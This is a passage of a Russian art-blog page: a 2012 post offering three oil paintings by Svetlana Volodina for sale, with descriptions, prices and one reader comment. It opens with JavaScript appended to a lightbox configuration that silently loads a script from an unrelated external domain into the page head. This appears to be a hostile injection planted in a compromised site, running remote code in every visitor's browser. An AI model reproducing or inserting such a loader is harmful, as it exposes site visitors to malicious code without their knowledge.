, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Картины для продажи Светланы Володиной

Автор: Дмитрий Алмазов | 10 Июн 2012

Представляю серию картин для продажи художницы Светланы Володиной из Воронежа.

Воспоминания о лете
У каждого человека свои воспоминания о лете. Это может быть росистое утро, жаркий полдень, великолепные багровые закаты, и стрекот цикад по ночам. Это ароматы сена и яблок в жаркий день, солнечные зайчики в саду, и вкус парного молока. Светлана Володина передала эти ощущения в своем натюрморте "Воспоминания о лете". Насыщенные цвета в народных мотивах передают состояние знойного дня и будят ностальгические воспоминания о деревенской жизни.

Картина Воспоминания о лете, 65х65 см, холст, масло. Цена 18 000 руб.

Картина АвгустКартина "Август" передает состояние окончания лета, когда в воздухе кружится запах сена и дыма, слышен стрекот кузнечиков и птиц, а потускневшая трава и уставшая от жары земля ожидают прохлады и отдыха.

Картина Август, 40×50, холст, масло. Цена 8 500 руб

Осень. Ветреный и дождливый октябрь. Никогда и ни в чем не изменяющая себе пора. Запах мокрых опавших листьев и коры обнаженных деревьев в саду. В свежей влажности воздуха вечное предчувствие дождя и Последние розыскромное золото листвы на фоне свинцового неба. Срезаны последние розы - прощальный подарок ушедшего лета.
Лирический этюд Светланы Володиной "Последние розы" навевает легкую осеннюю грусть и передает состояние природы в предзимние дни.

Картина Последние розы, 60х80, холст, масло. Цена 10 000 руб.

Купить картины Вы можете заполнив форму на странице контакты

Темы: Арт Воронеж, Галерея картин художников, Интернет - Магазин, Новости | 1 отзыв »

Один отзыв на “Картины для продажи Светланы Володиной”

  1. Елена пишет:
    07 Июл 2012 в 06:42

    Картины просто необыкновенные! «Август» как-то по особому затронул душу, есть в ней легкая грусть, ведь лето на исходе, но грусть это мимолетная, она тут же исчезает и растворяется в целом букете ароматов.

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress